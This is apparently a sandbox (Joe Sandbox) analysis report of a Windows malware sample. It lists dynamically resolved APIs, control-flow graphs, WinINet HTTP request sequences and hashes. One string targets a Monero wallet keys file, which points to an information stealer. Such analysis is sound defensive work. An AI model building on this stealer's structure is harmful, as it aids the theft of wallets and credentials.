                            • GetProcAddress.KERNEL32(75900000,013A07B0), ref: 006999AD
                            • GetProcAddress.KERNEL32(75900000,013967C0), ref: 006999C5
                            • GetProcAddress.KERNEL32(75900000,013A0840), ref: 006999DE
                            • GetProcAddress.KERNEL32(75900000,013A0558), ref: 006999F6
                            • GetProcAddress.KERNEL32(75900000,013967E0), ref: 00699A0E
                            • GetProcAddress.KERNEL32(75900000,013A05D0), ref: 00699A27
                            • GetProcAddress.KERNEL32(75900000,013A0600), ref: 00699A3F
                            • GetProcAddress.KERNEL32(75900000,01396A20), ref: 00699A57
                            • GetProcAddress.KERNEL32(75900000,013A0618), ref: 00699A70
                            • GetProcAddress.KERNEL32(75900000,01396740), ref: 00699A88
                            • LoadLibraryA.KERNEL32(013A0720,?,00696A00), ref: 00699A9A
                            • LoadLibraryA.KERNEL32(013A0690,?,00696A00), ref: 00699AAB
                            • LoadLibraryA.KERNEL32(013A0738,?,00696A00), ref: 00699ABD
                            • LoadLibraryA.KERNEL32(013A0678,?,00696A00), ref: 00699ACF
                            • LoadLibraryA.KERNEL32(013A0660,?,00696A00), ref: 00699AE0
                            • GetProcAddress.KERNEL32(75070000,013A0648), ref: 00699B02
                            • GetProcAddress.KERNEL32(75FD0000,013A06A8), ref: 00699B23
                            • GetProcAddress.KERNEL32(75FD0000,013A8FB8), ref: 00699B3B
                            • GetProcAddress.KERNEL32(75A50000,013A8F28), ref: 00699B5D
                            • GetProcAddress.KERNEL32(74E50000,01396720), ref: 00699B7E
                            • GetProcAddress.KERNEL32(76E80000,013A8A90), ref: 00699B9F
                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00699BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00699BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: ad1bbda16a4376cdc115e08442a268f0bb3c439082a5461db7488de2ae3117ae
                            • Instruction ID: e90d11b9e75d8bcb3970622a30c118ad49fa7be448549b50bdb3eeca76e73b76
                            • Opcode Fuzzy Hash: ad1bbda16a4376cdc115e08442a268f0bb3c439082a5461db7488de2ae3117ae
                            • Instruction Fuzzy Hash: 9CA12CB550024C9FD34CEFA8FD88E663BF9F74C309B14852AA646C3264D7399852CB66

                            Control-flow Graph

                            Graph data not reproduced: function 6845c0 calls RtlAllocateHeap, iterates over the block 6846ac-68474a, then calls VirtualProtect (see the API list below).
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0068460E
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0068479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (30 xrefs: 006845C7, 006845D2, 006845DD, 006845E8, 006845F3, 00684617, 00684622, 0068462D, 00684638, 00684643, 00684657, 00684662, 0068466D, 00684678, 00684683, 006846AC, 006846B7, 006846C2, 006846CD, 006846D8, 00684713, 0068471E, 00684729, 00684734, 0068473F, 0068474F, 0068475A, 00684765, 00684770, 0068477B)
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated, $-separated)
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 448e4dc9751de81d7d169ba69f590b986011d0186bc916c377c885265cc6aa99
                            • Instruction ID: f755fa716f5246bb909c964c4b16ab1c5f728e750e91e62cf2b828ed54f0fdc6
                            • Opcode Fuzzy Hash: 448e4dc9751de81d7d169ba69f590b986011d0186bc916c377c885265cc6aa99
                            • Instruction Fuzzy Hash: DC4116257CA7047FCE26F7A4884EE9D77975F4B700F515346A80152296EBB06B40CD26

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                              • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00684915
                            • StrCmpCA.SHLWAPI(?,013AE3F0), ref: 0068493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00684ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006A0DDB,00000000,?,?,00000000,?,",00000000,?,013AE340), ref: 00684DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00684E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00684E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00684E49
                            • InternetCloseHandle.WININET(00000000), ref: 00684EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00684EC5
                            • HttpOpenRequestA.WININET(00000000,013AE3A0,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00684B15
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • InternetCloseHandle.WININET(00000000), ref: 00684ECF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 7ac2fbebc63bd5802c71d420feddee217f22b94d9f6d2cf1db2d882883a0bcb6
                            • Instruction ID: 1e9272e0a36d166422f7eb91f374de04df4d18a0dada76f0fdc1716fc02316af
                            • Opcode Fuzzy Hash: 7ac2fbebc63bd5802c71d420feddee217f22b94d9f6d2cf1db2d882883a0bcb6
                            • Instruction Fuzzy Hash: 6912E971921118AADF54EB90DD92FEEB3BEBF15300F50419DB10662491EF702E49CFAA
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: d21666ad70c3238a244bbb6f98da01a8c6251b05e34cc1adcbb1621028841625
                            • Instruction ID: d0f13dbc10b9badc13b40dbe5546ec74484ece50901d10e400492ba806b8e903
                            • Opcode Fuzzy Hash: d21666ad70c3238a244bbb6f98da01a8c6251b05e34cc1adcbb1621028841625
                            • Instruction Fuzzy Hash: 8CF04FB1944208ABCB04DF99DD4AFAEBBBCFB04715F10026AFA05A2680C77915048BA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: d5fbe88888d172d4a4bb7c3888ddf4f9eecd6c369862836c195b7480d4f69ca5
                            • Instruction ID: 44cf5ee2f88dbaa916132db9e137101b0d4ad597031a064159f15f0a3dcaea39
                            • Opcode Fuzzy Hash: d5fbe88888d172d4a4bb7c3888ddf4f9eecd6c369862836c195b7480d4f69ca5
                            • Instruction Fuzzy Hash: F6D05E7490030CDBCB04EFE0DC8DADDBB78FB08315F000694D94562340EA305482CBA6

                            Control-flow Graph

                            APIs
                            • GetProcAddress.KERNEL32(75900000,013968A0), ref: 00699C2D
                            • GetProcAddress.KERNEL32(75900000,013969A0), ref: 00699C45
                            • GetProcAddress.KERNEL32(75900000,013A8C40), ref: 00699C5E
                            • GetProcAddress.KERNEL32(75900000,013A8D48), ref: 00699C76
                            • GetProcAddress.KERNEL32(75900000,013ACAF0), ref: 00699C8E
                            • GetProcAddress.KERNEL32(75900000,013ACC40), ref: 00699CA7
                            • GetProcAddress.KERNEL32(75900000,0139B310), ref: 00699CBF
                            • GetProcAddress.KERNEL32(75900000,013ACD60), ref: 00699CD7
                            • GetProcAddress.KERNEL32(75900000,013ACC70), ref: 00699CF0
                            • GetProcAddress.KERNEL32(75900000,013ACCA0), ref: 00699D08
                            • GetProcAddress.KERNEL32(75900000,013ACBC8), ref: 00699D20
                            • GetProcAddress.KERNEL32(75900000,013966A0), ref: 00699D39
                            • GetProcAddress.KERNEL32(75900000,013968C0), ref: 00699D51
                            • GetProcAddress.KERNEL32(75900000,01396940), ref: 00699D69
                            • GetProcAddress.KERNEL32(75900000,013968E0), ref: 00699D82
                            • GetProcAddress.KERNEL32(75900000,013ACC88), ref: 00699D9A
                            • GetProcAddress.KERNEL32(75900000,013ACCE8), ref: 00699DB2
                            • GetProcAddress.KERNEL32(75900000,0139AF28), ref: 00699DCB
                            • GetProcAddress.KERNEL32(75900000,01396960), ref: 00699DE3
                            • GetProcAddress.KERNEL32(75900000,013ACDD8), ref: 00699DFB
                            • GetProcAddress.KERNEL32(75900000,013ACCB8), ref: 00699E14
                            • GetProcAddress.KERNEL32(75900000,013ACDC0), ref: 00699E2C
                            • GetProcAddress.KERNEL32(75900000,013ACCD0), ref: 00699E44
                            • GetProcAddress.KERNEL32(75900000,01396680), ref: 00699E5D
                            • GetProcAddress.KERNEL32(75900000,013ACD78), ref: 00699E75
                            • GetProcAddress.KERNEL32(75900000,013ACC58), ref: 00699E8D
                            • GetProcAddress.KERNEL32(75900000,013ACB08), ref: 00699EA6
                            • GetProcAddress.KERNEL32(75900000,013ACD90), ref: 00699EBE
                            • GetProcAddress.KERNEL32(75900000,013ACC28), ref: 00699ED6
                            • GetProcAddress.KERNEL32(75900000,013ACB80), ref: 00699EEF
                            • GetProcAddress.KERNEL32(75900000,013ACD00), ref: 00699F07
                            • GetProcAddress.KERNEL32(75900000,013ACB98), ref: 00699F1F
                            • GetProcAddress.KERNEL32(75900000,013ACB20), ref: 00699F38
                            • GetProcAddress.KERNEL32(75900000,013A9E58), ref: 00699F50
                            • GetProcAddress.KERNEL32(75900000,013ACB38), ref: 00699F68
                            • GetProcAddress.KERNEL32(75900000,013ACD18), ref: 00699F81
                            • GetProcAddress.KERNEL32(75900000,01396A00), ref: 00699F99
                            • GetProcAddress.KERNEL32(75900000,013ACB50), ref: 00699FB1
                            • GetProcAddress.KERNEL32(75900000,013966C0), ref: 00699FCA
                            • GetProcAddress.KERNEL32(75900000,013ACDA8), ref: 00699FE2
                            • GetProcAddress.KERNEL32(75900000,013ACD30), ref: 00699FFA
                            • GetProcAddress.KERNEL32(75900000,013962C0), ref: 0069A013
                            • GetProcAddress.KERNEL32(75900000,01396480), ref: 0069A02B
                            • LoadLibraryA.KERNEL32(013ACD48,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A03D
                            • LoadLibraryA.KERNEL32(013ACBF8,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A04E
                            • LoadLibraryA.KERNEL32(013ACB68,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A060
                            • LoadLibraryA.KERNEL32(013ACBB0,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A072
                            • LoadLibraryA.KERNEL32(013ACBE0,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A083
                            • LoadLibraryA.KERNEL32(013ACC10,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A095
                            • LoadLibraryA.KERNEL32(013ACE20,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A0A7
                            • LoadLibraryA.KERNEL32(013ACFA0,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A0B8
                            • GetProcAddress.KERNEL32(75FD0000,01396620), ref: 0069A0DA
                            • GetProcAddress.KERNEL32(75FD0000,013ACE50), ref: 0069A0F2
                            • GetProcAddress.KERNEL32(75FD0000,013A8B10), ref: 0069A10A
                            • GetProcAddress.KERNEL32(75FD0000,013ACE98), ref: 0069A123
                            • GetProcAddress.KERNEL32(75FD0000,013964C0), ref: 0069A13B
                            • GetProcAddress.KERNEL32(6FD30000,0139B108), ref: 0069A160
                            • GetProcAddress.KERNEL32(6FD30000,013963E0), ref: 0069A179
                            • GetProcAddress.KERNEL32(6FD30000,0139B130), ref: 0069A191
                            • GetProcAddress.KERNEL32(6FD30000,013ACDF0), ref: 0069A1A9
                            • GetProcAddress.KERNEL32(6FD30000,013ACE80), ref: 0069A1C2
                            • GetProcAddress.KERNEL32(6FD30000,01396660), ref: 0069A1DA
                            • GetProcAddress.KERNEL32(6FD30000,013963C0), ref: 0069A1F2
                            • GetProcAddress.KERNEL32(6FD30000,013ACE38), ref: 0069A20B
                            • GetProcAddress.KERNEL32(763B0000,01396400), ref: 0069A22C
                            • GetProcAddress.KERNEL32(763B0000,013963A0), ref: 0069A244
                            • GetProcAddress.KERNEL32(763B0000,013ACEB0), ref: 0069A25D
                            • GetProcAddress.KERNEL32(763B0000,013ACF28), ref: 0069A275
                            • GetProcAddress.KERNEL32(763B0000,01396460), ref: 0069A28D
                            • GetProcAddress.KERNEL32(750F0000,0139B180), ref: 0069A2B3
                            • GetProcAddress.KERNEL32(750F0000,0139B1A8), ref: 0069A2CB
                            • GetProcAddress.KERNEL32(750F0000,013ACE68), ref: 0069A2E3
                            • GetProcAddress.KERNEL32(750F0000,01396440), ref: 0069A2FC
                            • GetProcAddress.KERNEL32(750F0000,01396420), ref: 0069A314
                            • GetProcAddress.KERNEL32(750F0000,0139B1D0), ref: 0069A32C
                            • GetProcAddress.KERNEL32(75A50000,013ACF88), ref: 0069A352
                            • GetProcAddress.KERNEL32(75A50000,013964A0), ref: 0069A36A
                            • GetProcAddress.KERNEL32(75A50000,013A8A40), ref: 0069A382
                            • GetProcAddress.KERNEL32(75A50000,013ACEC8), ref: 0069A39B
                            • GetProcAddress.KERNEL32(75A50000,013ACEE0), ref: 0069A3B3
                            • GetProcAddress.KERNEL32(75A50000,013964E0), ref: 0069A3CB
                            • GetProcAddress.KERNEL32(75A50000,01396500), ref: 0069A3E4
                            • GetProcAddress.KERNEL32(75A50000,013ACEF8), ref: 0069A3FC
                            • GetProcAddress.KERNEL32(75A50000,013ACF40), ref: 0069A414
                            • GetProcAddress.KERNEL32(75070000,01396520), ref: 0069A436
                            • GetProcAddress.KERNEL32(75070000,013ACF10), ref: 0069A44E
                            • GetProcAddress.KERNEL32(75070000,013ACF58), ref: 0069A466
                            • GetProcAddress.KERNEL32(75070000,013ACF70), ref: 0069A47F
                            • GetProcAddress.KERNEL32(75070000,013ACE08), ref: 0069A497
                            • GetProcAddress.KERNEL32(74E50000,01396540), ref: 0069A4B8
                            • GetProcAddress.KERNEL32(74E50000,01396380), ref: 0069A4D1
                            • GetProcAddress.KERNEL32(75320000,01396280), ref: 0069A4F2
                            • GetProcAddress.KERNEL32(75320000,013AC7F0), ref: 0069A50A
                            • GetProcAddress.KERNEL32(6F060000,01396560), ref: 0069A530
                            • GetProcAddress.KERNEL32(6F060000,01396580), ref: 0069A548
                            • GetProcAddress.KERNEL32(6F060000,013965A0), ref: 0069A560
                            • GetProcAddress.KERNEL32(6F060000,013ACA48), ref: 0069A579
                            • GetProcAddress.KERNEL32(6F060000,013965C0), ref: 0069A591
                            • GetProcAddress.KERNEL32(6F060000,013965E0), ref: 0069A5A9
                            • GetProcAddress.KERNEL32(6F060000,01396600), ref: 0069A5C2
                            • GetProcAddress.KERNEL32(6F060000,01396640), ref: 0069A5DA
                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0069A5F1
                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0069A607
                            • GetProcAddress.KERNEL32(74E00000,013AC9A0), ref: 0069A629
                            • GetProcAddress.KERNEL32(74E00000,013A8B60), ref: 0069A641
                            • GetProcAddress.KERNEL32(74E00000,013AC9D0), ref: 0069A659
                            • GetProcAddress.KERNEL32(74E00000,013AC988), ref: 0069A672
                            • GetProcAddress.KERNEL32(74DF0000,01396300), ref: 0069A693
                            • GetProcAddress.KERNEL32(6E350000,013AC9B8), ref: 0069A6B4
                            • GetProcAddress.KERNEL32(6E350000,013962A0), ref: 0069A6CD
                            • GetProcAddress.KERNEL32(6E350000,013AC880), ref: 0069A6E5
                            • GetProcAddress.KERNEL32(6E350000,013AC928), ref: 0069A6FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: d4b34e84065022e7ffa2a3ed557908043b71c11ae208208598f063d6f271b6de
                            • Instruction ID: a6a0f6526888c5f7463c6b466279a0297e02667b5c983ce207251dad48f08205
                            • Opcode Fuzzy Hash: d4b34e84065022e7ffa2a3ed557908043b71c11ae208208598f063d6f271b6de
                            • Instruction Fuzzy Hash: AC624CB550020CAFC34CDFA8FD88D663BF9F78C709B14852AA649C3224D739A851DF56

                            Control-flow Graph

                            control_flow_graph 1033 686280-68630b call 69a7a0 call 6847b0 call 69a740 InternetOpenA StrCmpCA 1040 68630d 1033->1040 1041 686314-686318 1033->1041 1040->1041 1042 686509-686525 call 69a7a0 call 69a800 * 2 1041->1042 1043 68631e-686342 InternetConnectA 1041->1043 1062 686528-68652d 1042->1062 1045 686348-68634c 1043->1045 1046 6864ff-686503 InternetCloseHandle 1043->1046 1048 68635a 1045->1048 1049 68634e-686358 1045->1049 1046->1042 1051 686364-686392 HttpOpenRequestA 1048->1051 1049->1051 1053 686398-68639c 1051->1053 1054 6864f5-6864f9 InternetCloseHandle 1051->1054 1056 68639e-6863bf InternetSetOptionA 1053->1056 1057 6863c5-686405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1058 68642c-68644b call 698940 1057->1058 1059 686407-686427 call 69a740 call 69a800 * 2 1057->1059 1067 6864c9-6864e9 call 69a740 call 69a800 * 2 1058->1067 1068 68644d-686454 1058->1068 1059->1062 1067->1062 1071 686456-686480 InternetReadFile 1068->1071 1072 6864c7-6864ef InternetCloseHandle 1068->1072 1076 68648b 1071->1076 1077 686482-686489 1071->1077 1072->1054 1076->1072 1077->1076 1080 68648d-6864c5 call 69a9b0 call 69a8a0 call 69a800 1077->1080 1080->1071
                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                              • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                            • StrCmpCA.SHLWAPI(?,013AE3F0), ref: 00686303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                            • HttpOpenRequestA.WININET(00000000,GET,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00686385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006863FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0068646D
                            • InternetCloseHandle.WININET(00000000), ref: 006864EF
                            • InternetCloseHandle.WININET(00000000), ref: 006864F9
                            • InternetCloseHandle.WININET(00000000), ref: 00686503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: c98ed0f7d7054063e2628425d161114b4c2248fce51ccc2486a9c459bc7dfd50
                            • Instruction ID: 47a761aee08d2206fdea0ae03e249894aeded9a15a3b784e257accfab250e3f5
                            • Opcode Fuzzy Hash: c98ed0f7d7054063e2628425d161114b4c2248fce51ccc2486a9c459bc7dfd50
                            • Instruction Fuzzy Hash: 6F713071A00218ABDF14EBE0DC49FEE77BAFB44704F108158F50A6B590DBB46A85CF91

                            Control-flow Graph

                            control_flow_graph 1090 695510-695577 call 695ad0 call 69a820 * 3 call 69a740 * 4 1106 69557c-695583 1090->1106 1107 695585-6955b6 call 69a820 call 69a7a0 call 681590 call 6951f0 1106->1107 1108 6955d7-69564c call 69a740 * 2 call 681590 call 6952c0 call 69a8a0 call 69a800 call 69aad0 StrCmpCA 1106->1108 1124 6955bb-6955d2 call 69a8a0 call 69a800 1107->1124 1134 695693-6956a9 call 69aad0 StrCmpCA 1108->1134 1138 69564e-69568e call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1108->1138 1124->1134 1139 6957dc-695844 call 69a8a0 call 69a820 * 2 call 681670 call 69a800 * 4 call 696560 call 681550 1134->1139 1140 6956af-6956b6 1134->1140 1138->1134 1269 695ac3-695ac6 1139->1269 1142 6957da-69585f call 69aad0 StrCmpCA 1140->1142 1143 6956bc-6956c3 1140->1143 1162 695991-6959f9 call 69a8a0 call 69a820 * 2 call 681670 call 69a800 * 4 call 696560 call 681550 1142->1162 1163 695865-69586c 1142->1163 1147 69571e-695793 call 69a740 * 2 call 681590 call 6952c0 call 69a8a0 call 69a800 call 69aad0 StrCmpCA 1143->1147 1148 6956c5-695719 call 69a820 call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1143->1148 1147->1142 1246 695795-6957d5 call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1147->1246 1148->1142 1162->1269 1169 69598f-695a14 call 69aad0 StrCmpCA 1163->1169 1170 695872-695879 1163->1170 1198 695a28-695a91 call 69a8a0 call 69a820 * 2 call 681670 call 69a800 * 4 call 696560 call 681550 1169->1198 1199 695a16-695a21 Sleep 1169->1199 1177 69587b-6958ce call 69a820 call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1170->1177 1178 6958d3-695948 call 69a740 * 2 call 681590 call 6952c0 call 69a8a0 call 69a800 call 69aad0 StrCmpCA 1170->1178 1177->1169 1178->1169 1275 69594a-69598a call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1178->1275 1198->1269 1199->1106 1246->1142 1275->1169
                            APIs
                              • Part of subcall function 0069A820: lstrlen.KERNEL32(00684F05,?,?,00684F05,006A0DDE), ref: 0069A82B
                              • Part of subcall function 0069A820: lstrcpy.KERNEL32(006A0DDE,00000000), ref: 0069A885
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006956A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695857
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
